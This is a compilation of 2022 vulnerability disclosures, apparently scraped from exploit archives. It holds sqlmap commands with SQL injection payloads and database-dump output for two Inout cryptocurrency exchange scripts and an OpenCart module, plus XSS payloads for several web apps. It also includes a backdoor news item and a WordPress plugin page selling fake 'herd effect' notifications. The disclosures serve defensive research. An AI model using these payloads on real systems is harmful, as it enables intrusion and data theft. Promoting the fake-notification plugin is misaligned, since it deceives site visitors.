Blockchain FiatExchanger version 2.2.1 suffers from a remote blind SQL injection vulnerability.

# Information  
```  
Vulnerability Name  : Remote Blind SQL Injections in Inout Blockchain FiatExchanger  
Product             : Inout Blockchain FiatExchanger  
version             : 2.2.1  
Date                : 2022-05-21  
Vendor Site         : https://www.inoutscripts.com/products/inout-blockchain-fiatexchanger/  
Exploit Detail      : https://github.com/bigb0x/CVEs/blob/main/Inout-Blockchain-FiatExchanger-221-sqli.md  
CVE-Number          : In Progess  
Exploit Author      : Mohamed N. Ali @MohamedNab1l  
```  
<br>

# Description  
<br>

SQL injection attack has been discovered in Blockchain FiatExchanger v2.2.1 platform. This will allow remote non-authenticated attackers to inject SQL code. This could result in full information disclosure.  
<br>

## Vulnerable Parameter: symbol (GET)

<br>

Vulnerability File: /application/third_party/Chart/TradingView/chart_content/master.php line 130

<br>

### Sqlmap command:  
`  
python sqlmap.py -u "http://http://vulnerable-host.com/application/third_party/Chart/TradingView/chart_content/master.php/history?from=1652675947&resolution=5&symbol=BTC-BCH" -p symbol --dbms=MySQL --banner --random-agent --current-db --dbs --current-user

`  
<br>

### output:  
`  
[20:05:54] [INFO] fetched random HTTP User-Agent header value 'Opera/9.20(Windows NT 5.1; U; en)' from file '/root/sqlmap/data/txt/user-agents.txt'  
[20:05:55] [INFO] testing connection to the target URL  
[20:05:55] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests  
sqlmap resumed the following injection point(s) from stored session:

Parameter: symbol (GET)  
    Type: error-based  
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)  
    Payload: from=1652675947&resolution=5&symbol=BTC-BCH' AND (SELECT 1746 FROM(SELECT COUNT(*),CONCAT(0x71707a6b71,(SELECT (ELT(1746=1746,1))),0x7171627671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'hIKU'='hIKU

    Type: time-based blind  
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
    Payload: from=1652675947&resolution=5&symbol=BTC-BCH' AND (SELECT 4566 FROM (SELECT(SLEEP(5)))kVcR) AND 'JGrB'='JGrB

[20:05:55] [INFO] testing MySQL  
[20:05:56] [INFO] confirming MySQL  
[20:05:57] [INFO] the back-end DBMS is MySQL  
[20:05:57] [INFO] fetching banner  
[20:05:57] [INFO] resumed: '5.6.50'  
web application technology: PHP 7.0.33  
back-end DBMS: MySQL >= 5.0.0  
banner: '5.6.50'  
[20:05:57] [INFO] fetching current user  
[20:05:57] [INFO] retrieved: 'root@localhost'  
current user: 'root@localhost'  
[20:05:57] [INFO] fetching current database  
[20:05:57] [INFO] resumed: 'inout_blockchain_fiatexchanger_db'  
current database: 'inout_blockchain_fiatexchanger_db'  
[20:05:57] [INFO] fetching database names  
[20:05:57] [INFO] resumed: 'information_schema'  
[20:05:57] [INFO] resumed: 'inout_blockchain_fiatexchanger_addons_db'  
[20:05:57] [INFO] resumed: 'inout_blockchain_fiatexchanger_cryptotrading_db'  
[20:05:57] [INFO] resumed: 'inout_blockchain_fiatexchanger_db'  
[20:05:57] [INFO] resumed: 'mysql'  
[20:05:57] [INFO] resumed: 'performance_schema'  
available databases [6]:  
[*] information_schema  
[*] inout_blockchain_fiatexchanger_addons_db  
[*] inout_blockchain_fiatexchanger_cryptotrading_db  
[*] inout_blockchain_fiatexchanger_db  
[*] mysql  
[*] performance_schema

`  
<br>  
<img src="./resources/Blockchain-FiatExchanger-221-sqlmap1.png">  
<br>  
<img src="./resources/Blockchain-FiatExchanger-221-sqlmap2.png">  
<br>

## Timeline  
```  
2022-05-03: Discovered the bug  
2022-05-03: Reported to vendor  
2022-05-21: Advisory published  
```

<br>

## Discovered by  
```  
Mohamed N. Ali  
@MohamedNab1l  
ali.mohamed@gmail.com

```

Blockchain FiatExchanger 2.2.1 SQL Injection

Blockchain AltExchanger version 1.2.1 suffers from multiple remote SQL injection vulnerabilities.

    # Information```Vulnerability Name  : Multiple Remote SQL Injections in Inout Blockchain AltExchangerProduct             : Inout Blockchain AltExchangerversion             : 1.2.1Date                : 2022-05-21Vendor Site         : https://www.inoutscripts.com/products/inout-blockchain-altexchanger/Exploit Detail      : https://github.com/bigb0x/CVEs/blob/main/Blockchain-AltExchanger-121-sqli.mdCVE-Number          : In ProgessExploit Author      : Mohamed N. Ali @MohamedNab1l```<br># Description<br>Three SQL injections have been discovered in Blockchain AltExchanger cryptocurrency exchange platform v1.2.1. This will allow remote non-authenticated attackers to inject SQL code. This could result in full information disclosure.<br>## 1- Vulnerable Parameter: symbol (GET)<br>Vulnerability File: /application/third_party/Chart/TradingView/chart_content/master.php<br>### Sqlmap command:`python sqlmap.py -u "http://vulnerable-host.com/application/third_party/Chart/TradingView/chart_content/master.php/history?from=1652650195&resolution=5&symbol=BTC-BCH" -p symbol --dbms=MySQL --banner --random-agent --current-db`<br>### output:`Parameter: symbol (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: from=1652650195&resolution=5&symbol=BTC-BCH') AND 7820=7820 AND ('HqKC'='HqKC    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: from=1652650195&resolution=5&symbol=BTC-BCH') AND (SELECT 1060 FROM (SELECT(SLEEP(5)))WJpc) AND ('rQoO'='rQoO[16:43:22] [INFO] testing MySQL[16:43:23] [INFO] confirming MySQL[16:43:26] [INFO] the back-end DBMS is MySQL[16:43:26] [INFO] fetching banner[16:43:26] [INFO] resumed: 5.6.50web application technology: PHP 7.0.33back-end DBMS: MySQL >= 5.0.0banner: '5.6.50'[16:43:26] [INFO] fetching current database[16:43:26] [INFO] retrieved: inout_blockchain_altexchanger_dbcurrent database: 'inout_blockchain_altexchanger_db'`<br><img src="./resources/Blockchain-AltExchanger-121-sqli-1.png"><br>## 2- Vulnerable Parameter: marketcurrency (POST)<br>Vulnerability File: /index.php/coins/update_marketboxslider<br>### HTTP Request:----------------------------------------------------`POST /index.php/coins/update_marketboxslider HTTP/1.1Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://vulnerable-host.com/Cookie: inoutio_language=4Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip,deflate,brContent-Length: 69User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36Host: vulnerable-host.comConnection: Keep-alivedisplaylimit=4&marketcurrency=-INJEQT-SQL-HERE`----------------------------------------------------<br>## 3- Vulnerable Parameter: Cookie: inoutio_language (GET)<br>Vulnerability File: /index.php<br>### HTTP Request:----------------------------------------------------`GET /index.php/home/about HTTP/1.1Referer: https://www.google.com/search?hl=en&q=testingUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36x-requested-with: XMLHttpRequestCookie: inoutio_language=0'XOR(if(now()=sysdate()%2Csleep(6)%2C0))XOR'ZAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip,deflate,brHost: vulnerable-host.comConnection: Keep-alive`----------------------------------------------------<br>## Timeline```2022-05-03: Discovered the bug2022-05-03: Reported to vendor2022-05-21: Advisory published```<br>## Discovered by```Mohamed N. Ali@MohamedNab1lali.mohamed at gmail.com```

Blockchain AltExchanger 1.2.1 SQL Injection

OpenCart Newsletter module version 3.0.2.0 suffers from a remote blind SQL injection vulnerability.

    # Exploit Title: OpenCart v3.x Newsletter Module - Blind SQLi# Date: 19/05/2022# Exploit Author: Saud Alenazi# Vendor Homepage: https://www.opencart.com/# Software Link: https://www.opencart.com/index.php?route=marketplace/extension/info&extension_id=32750&filter_member=Zemez# Version: v.3.0.2.0# Tested on: XAMPP, Linux# Contact: https://twitter.com/dmaral3noz* Description :Newsletter Module is compatible with any Opencart allows SQL Injection via parameter 'zemez_newsletter_email' in /index.php?route=extension/module/zemez_newsletter/addNewsletter. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.* Steps to Reproduce :- Go to : http://127.0.0.1/index.php?route=extension/module/zemez_newsletter/addNewsletter- Save request in BurpSuite- Run saved request with : sqlmap -r sql.txt -p zemez_newsletter_email --random-agent --level=5 --risk=3 --time-sec=5 --hex --dbsRequest :===========POST /index.php?route=extension/module/zemez_newsletter/addNewsletter HTTP/1.1Content-Type: application/x-www-form-urlencodedCookie: OCSESSID=aaf920777d0aacdee96eb7eb50Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip,deflateContent-Length: 29Host: 127.0.0.1User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0Connection: Keep-alivezemez_newsletter_email=saud===========Output :Parameter: zemez_newsletter_email (POST)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)    Payload: zemez_newsletter_email=saud%' AND 4728=(SELECT (CASE WHEN (4728=4728) THEN 4728 ELSE (SELECT 4929 UNION SELECT 7220) END))-- -    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: zemez_newsletter_email=saud%' OR (SELECT 4303 FROM(SELECT COUNT(*),CONCAT(0x716a6b7171,(SELECT (ELT(4303=4303,1))),0x7162787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'xlVz%'='xlVz    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: zemez_newsletter_email=saud%' AND (SELECT 5968 FROM (SELECT(SLEEP(5)))yYJX) AND 'yJkK%'='yJkK

OpenCart Newsletter 3.0.2.0 SQL Injection

A vulnerability, which was classified as problematic, has been found in Zoo Management System 1.0. Affected by this issue is /zoo/admin/public_html/view_accounts?type=zookeeper of the content module. The manipulation of the argument admin_name with the input <script>alert(1)</script> leads to an authenticated cross site scripting. Exploit details have been disclosed to the public.

**Zoo Management System - 'admin\_name' Stored Cross-Site Scripting(XSS)****Exploit Title: Zoo Management System - 'admin\_name' Stored Cross-Site Scripting(XSS)****Exploit Author: webraybtl@webray.com.cn inc****Vendor Homepage: https://www.sourcecodester.com/php/15347/zoo-management-system-source-code-php-mysql-database.html****Software Link: https://www.sourcecodester.com/download-code?nid=15347&title=Zoo+Management+System+source+code+in+PHP+with+MySQL+Database****Version: Zoo Management System 1.0****Tested on: Windows Server 2008 R2 Enterprise, Apache ,Mysql****Description**

Persistent XSS (or Stored XSS) attack is one of the three major categories of XSS attacks, the others being Non-Persistent (or Reflected) XSS and DOM-based XSS. In general, XSS attacks are based on the victim’s trust in a legitimate, but vulnerable, website or web application.Zoo Management System does not filter the content correctly at the "content" module, resulting in the generation of stored XSS.

**Payload used:**

<script>alert(111)</script>

**Proof of Concept**

1.  Login the CMS. Admin Default Access: Email: admin@mail.com Password: Password@123
    
2.  Open Page http://172.24.5.102/zoo/admin/public\_html/view\_accounts?type=zookeeper and click Edit button
    
3.  Put XSS payload (<script>alert(111)</script>) in the content box and click on Edit Account to publish the page
    

4.  Viewing the successfully published page,We can see the alert.

CVE-2022-1816: webray.com.cn/Zoo-Management-System(XSS).md at main · Xor-Gerke/webray.com.cn

Cross-site Scripting (XSS) - Reflected in GitHub repository collectiveaccess/providence prior to 1.8.

**Description**

Hello , i found an authenticated reflected xss via path fragment this was exploitable through trusting user input in url path fragement , please note : if you wrote a different payload you need to URL Encode the payload twice

**Proof of Concept**

    Enter this url : https://demo.collectiveaccess.org/index.php/system/Error/Show/n/3250%22%253CScRiPt%2520%253Ealert(%221337%22)%253C%252FsCripT%253E
    

**Picture:**

Kind Regards,

Rawi (@0xRaw)

**Impact**

Steal User Cookies or redirect user to malicious sites

CVE-2022-1825: Reflected XSS in providence

The Curtain WordPress plugin through 1.0.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks when the unfiltered_html capability is disallowed

    # Exploit Title: Multiple Stored Cross-Site Scripting vulnerabilitiesin WordPress curtain plugin 1.0.2# Date: 29-03-2022# Exploit Author: Hassan Khan Yusufzai - Splint3r7# Vendor Homepage: https://wordpress.org/plugins/curtain/# Version: 1.0.2# Tested on: Firefox# Contact me: h [at] spidersilk.com# DescriptionSeveral Cross-Site Scripting vulnerabilities in the Curtain WordPressplugin. Due to these Cross-Site Scripting vulnerabilities, an attackerwould be able to steal cookies, hijack sessions,s or control the browser ofthe victim.*Reproduce XSS in Heading Section:*1- Login to your WordPress Application2- Install curtain plugin3- Open the pagehttp://wordpressURL/wp-admin/options-general.php?page=curtain4- Inject Payload in Heading"><h1 onclick=alert(1)>XSS</h1>5- An alert will trigger.*Reproduce XSS in Managers Textarea Section:*1- Login to your WordPress Application2- Install curtain plugin3- Open the pagehttp://wordpressURL/wp-admin/options-general.php?page=curtain4- Inject Payload in Managers as"></textarea><script>alert(1)</script>5- An alert will trigger.

CVE-2022-1558: WordPress Curtain 1.0.2 Cross Site Scripting ≈ Packet Storm

Multiple versions of a WordPress plugin by the name of "School Management Pro" harbored a backdoor that could grant an adversary complete control over vulnerable websites.
The issue, spotted in premium versions before 9.9.7, has been assigned the CVE identifier CVE-2022-1609 and is rated 10 out of 10 for severity.
The backdoor, which is believed to have existed since version 8.9, enables "an

Multiple versions of a WordPress plugin by the name of "School Management Pro" harbored a backdoor that could grant an adversary complete control over vulnerable websites.

The issue, spotted in premium versions before 9.9.7, has been assigned the CVE identifier CVE-2022-1609 and is rated 10 out of 10 for severity.

The backdoor, which is believed to have existed since version 8.9, enables "an unauthenticated attacker to execute arbitrary PHP code on sites with the plugin installed," Jetpack's Harald Eilertsen said in a Friday write-up.

School Management, developed by an India-based company called Weblizar, is billed as a Wordpress add-on to "manage complete school operation." It also claims more than 340,000 customers of its premium and free WordPress themes and plugins.

The WordPress security company noted that it uncovered the implant on May 4 after it was alerted to the presence of heavily obfuscated code in the license-checking code of the plugin. The free version of School Management, which doesn't pack the licensing code, is not impacted.

While the backdoor has since been removed, the exact origins of the compromise remains unclear, with the vendor stating that "they do not know when or how the code came into their software."

Customers of the plugin are recommended to update to the latest version (9.9.7) to prevent active exploitation attempts.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Researchers Find Backdoor in School Management Plugin for WordPress

Insecure Direct Object References (IDOR) vulnerability in Spiffy Plugins Spiffy Calendar <= 4.9.0 at WordPress allows an attacker to edit or delete events.

CVE-2022-29434: Spiffy Calendar

Multiple Authenticated (administrator or higher user role) Persistent Cross-Site Scripting (XSS) vulnerabilities in TMS-Plugins wpDataTables plugin <= 2.1.27 on WordPress via &data-link-text, &data-link-url, &data, &data-shortcode, &data-star-num vulnerable parameters.

CVE-2022-29432: wpDataTables – Tables & Table Charts

Authenticated (admin or higher user role) Local File Inclusion (LFI) vulnerability in Wow-Company's Herd Effects plugin <= 5.2 at WordPress.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

**Description**

The Herd Effects is the free marketing tool to set and to post popup notifications on the site. The plugin serves to increase the conversion of web resource and motivate users to perform certain actions. It demonstrates the current or fictitious activity of other visitors and creates a “sense of live queue” effect.

The Herd Effects is a simple and effective solution to increase the conversion on the site. Using a WordPress plugin for social proof will allow you to demonstrate the activity of other users to visitors of the resource. The plugin forms a “herd effect”, attracts attention and motivates to commit various actions.

**Main features**

The Herd Effects will allow you to create a simple template and use it for an administrator-defined list of variable values. Notifications are designed to motivate the user to join the actions of others. Among its features:

*   configuring a template with variables to generate popup notification;
*   set the title;
*   more than 1400+ FontAwesome 5 icons ;
*   insert custom icons;
*   specifying the list of values for text variables;
*   set the minimum and maximum numeric values;
*   set the time interval for stable output of notifications;
*   edit the display on the screens less than the specified resolution;
*   insert an alert on the site using a shortcode.

**Quick Start video**

How to use and create a new social proof notification with Herd Effects plugin for WordPress.

**Pro version**

Enhance the “herd effect” of notifications by installing the Pro version of the plugin on your website:

*   unlimited amount of the notification sets;
*   generating an unlimited amount of the notifications in each set;
*   detailed adjustment of the style of the “herd effect” elements;
*   add a border and set the degree of rounding of its corners;
*   select a position to display each notification;
*   selection of colors for the background, borders, text and icons;
*   randomize the time intervals with which the notifications appear to add more realistic effect;
*   disabling a function of notifications closing by the user and setting auto-close;
*   control of the number of notifications;
*   add animation effects when windows appear and close;
*   connect and configure the output of the link via the notification;
*   display only for a specified period of time (from and to);
*   output of “herd effect” elements for all or separate user groups;
*   set the display depending on the language of the page;
*   edit the display of notifications on all or individual pages of the site, output items through the use of exceptions, IDs and categories.
*   And more…

Preview of Pro version

Buy Pro version

**Can be used for**

*   notification about registration on the site;
*   notifications with information on the purchase of goods;
*   informing visitors of the page about the ordering of the service by other users;
*   notifications about the installation of the application or program;
*   demonstration of the activity of users on the web resource;
*   notifications about subscription to the event of the company;
*   notifications about the mention of the resource in social networks;
*   informing users about real activity on the site and much more.

**Use with other plugins to maximize your results**

*   Popup Box – new WordPress popup plugin
*   Counter Box – powerful creator of counters, timers and countdowns
*   Button Generator – easily Button Builder
*   Herd Effects – fake notifications and social proof plugin
*   Floating Button
*   Side Menu Lite – add sticky fixed buttons
*   Sticky Buttons – floating buttons builder
*   Bubble Menu – circle floating menu
*   Float menu – awesome floating side menu
*   Modal Window – create modal window
*   Wow Skype Buttons
*   Border Menu
*   Slide Menu

**Support**

Search for answers and ask your questions at support center

**Screenshots**

**Installation**

*   Installation option 1: Find and install this plugin in the Plugins -> Add new section of your wp-admin
*   Installation option 2: Download the zip file, then upload the plugin via the wp-admin in the Plugins -> Add new section. Or unzip the archive and upload the folder to the plugins directory /wp-content/plugins/ via ftp
*   Press Activate when you have installed the plugin via dashboard or press Activate in the in the Plugins list
*   Go to Wow Herd Effects section that will appear in your main menu on the left
*   Click Add new to create your first set of notifications
*   Enter title that will appear in the notifications
*   Choose the icon that will appear in the notifications.
*   If you want a custom icon, tick Custom, upload your image via Media – Add new, then insert the link to your image. Recommended icon size is 60×60 pixels.
*   Construct your notifications template in the Text field.
*   Enter the values for your \[name\] and \[city\] variables. You can get the list of names and cities here. Note that you can use these variables for any kind of content, not just names and citites. Just enter any values you want and the plugin will randomly pick the values to be displayed in the notifications. Do not create new lines in the list of your variable, or the notifications will not work! Just enter the values, separated by comma.
*   Enter the minimum and maximum values of the Amount, if you are using it.
*   Click Save
*   Copy and paste the shortcode, such as \[Wow-Herd-Effects id=1\] to where you want the notifications to appear.
*   If you want the notifications to appear everywhere on your site, you can insert it in your header.php, like this: <?php echo do_shortcode('[Wow-Herd-Effects id=1]');?>
*   If you want to insert the shortcode into a widget, use this plugin

**Reviews**

Easy to use. No problems so far. Thanks for an amazing plugin.

Didn't work properly for me using the shortcode on one of my templates and it wasn't worth trying to fix it because the plugin is very restricted in the free version. Can't style it at all so you're left with a plain black look which is nothing but a distraction that looks very fake. Scarily I was putting it on my checkout page and recon this would have scared visitors off rather than pushed them towards the sale.

Why take the time and trouble to lie to those visiting your website when you could use a plugin to help? Herd Effects capitalizes on the emotional and brings out the worst in humanity to increase traffic to your website.

Steve August 31, 2020

This plugin works exactly as specified. It's the easiest to use of all plugins like this. The developer is extremely responsive and support is fantastic. I highly recommend using this plugin for your Herd Effects needs.

I installed and configured the plugin and it unconfigured all the banners on my homepage both on the desktop and on the mobile. Beautiful crap.

Read all 15 reviews

**Contributors & Developers**

“Herd Effects – fake notifications and social proof plugin” is open source software. The following people have contributed to this plugin.

Contributors

*    Wow-Company

**Changelog****5.2.1**

*   Fixed: security issue

**5.2**

*   Added: Export/Import functions
*   Fixed: minor bug

**5.1.3**

*   Fixed: minor bug

**5.1.2**

*   Fixed: minor bug

**5.1.1**

*   Fixed: script download queue

**5.1**

*   Updated: Font Awesome Icons to version 5.14
*   Fixed: minor bugs

**5.0.2**

*   Fixed: include script in footer

**5.0.1**

*   Fixed: custom image

**5.0**

*   Added: Live preview
*   Added: test mode option
*   Added: Unit for location
*   Updated: Admin style
*   Update: Font Awesome Icon to v. 5.12

**4.1**

*   Fixed: display of notification

**4.0.1**

*   Fixed: option ‘Show every (sec)’

**4.0**

*   Added: option for disabling FontAwesome 5 from front-end
*   Added: Content style options
*   Added: Title style options
*   Added: Icon style options
*   Added: Close button size option
*   Changed: Admin Style
*   Optimized: Styles and Scripts (minification and response time reduction)
*   Updated: FontAwesome 5
*   Fixed: Control on the devices

**3.1.3**

*   Fixed: Insert the shortcode

**3.1.2**

*   Fixed: Rounding the amount

**3.1.1**

*   Fixed: minor bugs
*   Fixed: main class

**3.1**

*   Fixed: minor bugs
*   Added: Support page
*   Added: Discount page

**3.0**

*   Added: function hiding menu on mobile
*   Changed: admin style
*   Changed: Up to 3 notifications

**2.3**

*   Fixed: minor bugs.
*   Change: Admin style.

**2.2**

*   Add: Interval display option.
*   Change: Admin style.

**2.1**

*   Fix: Can enter ‘Name’ and ‘City’ in new line.
*   Fix: Verifying access to the folder ‘asset’.
*   Fix: Optimized code.

**2.0**

*   Fixed code
*   Change style

**1.0**

*   Initial release

Tag

#php